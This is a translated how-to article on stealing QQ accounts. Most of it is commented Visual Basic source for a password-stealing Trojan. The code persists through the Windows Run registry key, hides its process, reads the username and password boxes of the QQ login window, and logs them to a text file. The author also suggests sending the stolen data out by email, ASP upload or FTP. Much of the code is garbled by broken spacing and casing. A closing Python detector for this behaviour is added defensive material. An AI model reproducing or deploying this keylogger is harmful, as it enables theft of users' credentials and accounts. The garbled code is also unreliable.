QQ account-stealing methods:
1. Exhaustion
The exhaustive method is the simplest and most effective one. It is what we usually call brute-force cracking. Its disadvantage is that it is slow and takes a long time. To counter brute forcing, Tencent introduced character-verification login in second-generation QQ, so this method is outdated and I will not go into it further.
2. Directly read the password file
QQ's encryption keeps getting stronger, so this method can take a lot of effort. Users in Internet cafes also tend to delete their QQ directory when they leave, so this method is sometimes powerless.
3. Monitoring Method
This is what everyone calls a "Trojan", and it is the most popular method of account theft on the Internet. I will explain in detail the principle and the Trojan code for getting a password through window functions (applicable to any version of QQ). Below is an example written in VB:
Design Concept
We know that the QQ password box is not specially protected. That is, SendMessage can be used to send WM_GETTEXT to the password box and get the value in it. This can be used to intercept the password; for details, see the following:
Use the timer control to monitor QQ.
Use window enumeration (EnumWindows) to obtain the title of every window (GetWindowText) and determine whether it is the "QQ User Logon" title. Obtain the class name (GetClassName) of each child window (control) of the QQ logon window, and then get the username and password from the ComboBox and Edit controls (by sending WM_GETTEXT via SendMessage).
Because the program cannot tell when an external key event occurs, it can only read the password value continuously. The specific method is as follows:
First, get the user name value, then keep getting the password value, and then check whether the window title is the user name. If it is the user name, the last password value is the real password. The program is complete.
Programming
(1) First, prevent the program from being loaded more than once, which would waste system resources and cause unnecessary errors.
Declare the variables, procedures, and API functions in the module1.bas file.
declare function createfilemapping lib "Kernel32" alias "createfilemappinga" (byval hfile as long, lpfilemappigattributes as security_attributes, byval flprotect as long, byval dwmaximumsizehigh as long, byval dwmaximumsizelow as long, byval lpname as string) as long 'create a new file ing object private declare function closehandle lib "Kernel32" (byval hobject as long) as long 'close a kernel object type security_attributes nlength as long lpsecuritydescriptor as long binherithandle as long end type const page_readwrite = 1 const error_already_exists = 183 & |
Create a procedure that determines whether the program has already been started
sub main () dim ynrun as long dim SA as security_attributes SA. binherithandle = 1 SA. lpsecuritydescriptor = 0 SA. nlength = Len (SA) ynrun = createfilemapping (& hffffffff, SA, page_readwrite, 0,128, app. title) 'create a memory ing file If (err. lastdllerror = error_already_exists) then' if the specified memory file already exists, then exit closehandle ynrun 'and close the memory ing file before exiting the Program end if end sub |
(2) For real-time monitoring, the program needs to start automatically when the system starts. Here we use the registry modification method.
Declare the variables, procedures, and API functions in the module1.bas file.
Declare function regcreatekey & lib "advapi32.dll" alias "regcreatekeya" (byval hkey &, byval lpszsubkey $, lphkey &) 'create a new item under the specified item. If the specified item already exists, the function opens the existing item.
Declare function regsetvalue lib "advapi32.dll" alias "regsetvaluea" (byval hkey as long, byval lpsubkey as string, byval dwtype as long, byval lpdata as string, byval cbdata as long) as long 'sets the default value of a specified item or subitem
Const HKEY_LOCAL_MACHINE = & h80000002
Const REG_SZ = 1
Create the procedure that makes the program start automatically
Sub Autorun () Dim skeyname as string, skeyvalue as string, skeyvalueicon as string Dim RET as integer, lphkey as long Skeyname = "SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run" 'is the position of the startup item in the registry. You may view it through regedit.exe. Skeyvalue = app. Path & IIF (LEN (App. Path)> 3, "\" & "killoicq.exe", "killoicq.exe") 'monitor.exe for this program Ret = regcreatekey & (HKEY_LOCAL_MACHINE, skeyname, lphkey) 'create a new startup Item Ret = regsetvalue & (lphkey &, "", REG_SZ, skeyvalue, 0 &) 'set the key value End sub |
(3) Hide the program itself (Me.Hide) and hide it from the Close Program dialog box.
Declare the variables, procedures, and API functions in the module1.bas file.
Declare function registerserviceprocess lib "Kernel32" (byval dwprocessid as long, byval dwtype as long) as long
Const rsp_simple_service = 1' hide
Create the procedure that hides the program from the Close Program dialog box
Sub hidemywin () Registerserviceprocess lngprocessid, rsp_simple_service End sub |
(4) Monitor whether OICQ is running
Load a Timer control with an Interval value of 1 (or as small a value as possible). This program uses the timer for monitoring.
Private sub timer1_timer () Enumwindows addressof enumproc, 0' all parent windows (top-level and all windows) in the enumerated window list, start monitoring program End sub |
Declare the variables, procedures, functions, and API functions in the module1.bas file.
Option explicit Declare function enumwindows lib "USER32" (byval lpenumfunc as any, byval lparam as long) As long 'query window Declare function getwindowtext lib "USER32" alias "getwindowtexta" (byval hwnd as long, byval lpstring as string, byval CCH as long) As long 'get the window title Declare function getclassname lib "USER32" alias "getclassnamea" (byval hwnd as long, byval lpclassname as string, byval nmaxcount as long) As long 'gets the class name for the specified window Declare function getwindow lib "USER32" (byval hwnd as long, byval wcmd as long) As long 'get a window handle Const gw_child = 5' find the first child window of the source window Const gw_hwndnext = 2' find the next sibling window for the source window Declare function sendmessage lib "USER32" alias "sendmessagea" (byval hwnd as long, byval _ Wmsg as long, byval wparam as long, lparam as any) As long 'send messages Const wm_gettext = & HD Const wm_gettextlength = & he Dim Buf as string Dim nameall, name, passwordall, password as string Dim I as integer Dim title, titleall, filepath as string Public Function enumproc (byval app_hwnd as long, byval lparam as long) as Boolean 'query the Main Window Dim Buf as string * 1024 Dim length as long Filepath = app. Path & "\ 0.txt" '0.txt is the file for saving the account and password. If Dir (filepath) = "" then Title = "" Titleall = "" End if Length = getwindowtext (app_hwnd, Buf, Len (BUF )) Title = left $ (BUF, length) 'get the title of the window If instr (title, "OICQ User Logon") then' determines whether it is a QQ window Call getziwin (app_hwnd) 'Call (5) to obtain the class name of the account and password box in the OICQ window End if If title <> "" then If instr (titleall, title) then Enumproc = 1 Else Titleall = titleall + title' title indicates the title of the obtained window. 
Account obtained by if name <> "" then" If instr (title, name) Then SaveFile 'Save the account password (if the obtained title is equal to the obtained account, it indicates that the user name and password have been removed successfully), then call (7) End if End if End if Enumproc = 1 End Function |
(5) Obtain the class names of the user name and password boxes in the OICQ window.
A custom function that gets child-window class names, written in the module1.bas file
We know that the class name of the user name box in the OICQ main window is ComboBox, and the class name of the password box is Edit. Here we obtain the class names and their handles in order to read their values.
Public Function getziwin (window_hwnd as long) as string Dim buflen as long Dim child_hwnd as long Dim children () as long Dim num_children as integer Dim I as integer 'Get the class name Buflen = 256 Buf = space $ (buflen-1) Buflen = getclassname (window_hwnd, Buf, buflen) Buf = left $ (BUF, buflen) If right (BUF, 8) = "ComboBox" or right (BUF, 4) = "edit" then' for judgment Getziwin = getwintext (window_hwnd) 'Call (6) to obtain their values Exit Function End if Num_children = 0 Child_hwnd = getwindow (window_hwnd, gw_child) 'gets the handle of the 1st subwindow. Do While child_hwnd <> 0' if a subwindow exists Num_children = num_children + 1 Redim preserve children (1 to num_children) Children (num_children) = child_hwnd Child_hwnd = getwindow (child_hwnd, gw_hwndnext) 'gets the handle of the next sibling window. Loop For I = 1 to num_children Call getziwin (Children (I )) Next I End Function |
(6) Step (5) obtained the class names of the user name and password boxes, along with their handles. This step reads their values.
A custom function that gets child-window values, written in the module1.bas file
Public Function getwintext (window_hwnd as long) as string 'gets the value of the subwindow. Dim txtlen as long Dim TXT as string 'Send wm_gettext via sendmessage to get the address bar value Getwintext = "" If window_hwnd = 0 Then exit function Txtlen = sendmessage (window_hwnd, wm_gettextlength, 0, 0) If txtlen = 0 Then exit function Txtlen = txtlen + 1 TXT = space $ (txtlen) Txtlen = sendmessage (window_hwnd, wm_gettext, txtlen, byval txt) Getwintext = left $ (txt, txtlen) If Buf = "ComboBox" then Name = getwintext If instr (nameall, name) then I = 0 Else Nameall = nameall + name I = I + 1 End if Else Password = getwintext If instr (passwordall, password) then I = 0 Else Passwordall = passwordall + Password I = I + 1 End if End if End Function |
(7) The program has now reached its final stage. If the user name and password were retrieved in (4), the relevant information is saved.
A custom procedure that saves the information, written in the module1.bas file
sub SaveFile () dim file_num as integer dim allstr as string allstr = Name & Space (5) & password & Space (5) & now 'Save account, password, start time file_num = freefile If Dir (filepath) = "" Then open filepath for output as # file_num else open filepath for append as # file_num end if Print # file_num, allstr close # file_num end sub |
Once this software has been run, it starts every time the system starts and monitors QQ. When you open QQ and enter the password, the software records your QQ account and password in the 0.txt file in the directory where the software is located. You only need to double-click the 0.txt file to view the account and password.
Additional instructions: Since the 0.txt file is saved locally, what should the remote computer do if it wants to know the password of the other party? You can use the email box to send 0.txt files to the specified email address. it can also be accepted through ASP. You can use an FTP space or a website to mount an ASP file, and then use a Trojan to send the account and password to the specified path to save the ASP file.
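From the defender's side, the behaviour described above leaves a recognisable pair of traces: a process writes its own path under the Run key, and the same process creates a text file next to its own executable. The Python code below is an added example, not part of the original article, that correlates the two. The event record layout, the C:\Tools directory and the benign entries are constructed for illustration; killoicq.exe, 0.txt and the Run key path are the names used in the article.

```python
import ntpath  # Windows path rules, usable on any OS
RUN_KEY = r"hklm\software\microsoft\windows\currentversion\run"

def norm(path):
    """Case-fold a Windows path and drop surrounding quotes and spaces."""
    return ntpath.normcase(path.strip().strip('"'))

def command_image(data):
    """Executable path from a Run value, which may be quoted and carry arguments."""
    data = data.strip()
    if data.startswith('"'):
        return norm(data[1:].split('"', 1)[0])
    end = data.lower().find(".exe")  # unquoted: keep paths that contain spaces
    return norm(data[:end + 4] if end != -1 else data)

def find_self_persisting_loggers(events):
    """Map each process image that registers ITSELF under the Run key to the
    .txt files it created in its own directory (event order is irrelevant)."""
    persisted, drops = set(), {}
    for ev in events:
        image = norm(ev["image"])
        if ev["type"] == "reg_set":
            key = norm(ev["target"]).rsplit("\\", 1)[0]  # strip the value name
            if key == RUN_KEY and command_image(ev["data"]) == image:
                persisted.add(image)
        elif ev["type"] == "file_create":
            target = norm(ev["target"])
            if target.endswith(".txt") and ntpath.dirname(target) == ntpath.dirname(image):
                drops.setdefault(image, []).append(target)
    return {img: files for img, files in drops.items() if img in persisted}

# Constructed telemetry (simplified layout, not a real product's log format).
SAMPLE_EVENTS = [
    {"type": "reg_set", "image": r"C:\Tools\KillOICQ.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\(Default)",
     "data": r"C:\Tools\killoicq.exe"},
    {"type": "file_create", "image": r"C:\Tools\killoicq.exe", "target": r"C:\Tools\0.txt"},
    # Benign updater: registers itself but logs elsewhere.
    {"type": "reg_set", "image": r"C:\Program Files\Updater\upd.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": r'"C:\Program Files\Updater\upd.exe" /background'},
    {"type": "file_create", "image": r"C:\Program Files\Updater\upd.exe",
     "target": r"C:\ProgramData\Updater\log.txt"},
    # Benign editor: writes beside itself but never touches the Run key.
    {"type": "file_create", "image": r"C:\Windows\notepad.exe", "target": r"C:\Windows\notes.txt"},
]

if __name__ == "__main__":
    print(find_self_persisting_loggers(SAMPLE_EVENTS))
```

Requiring both traces from the same image keeps ordinary self-registering updaters and programs that merely write beside themselves out of the result.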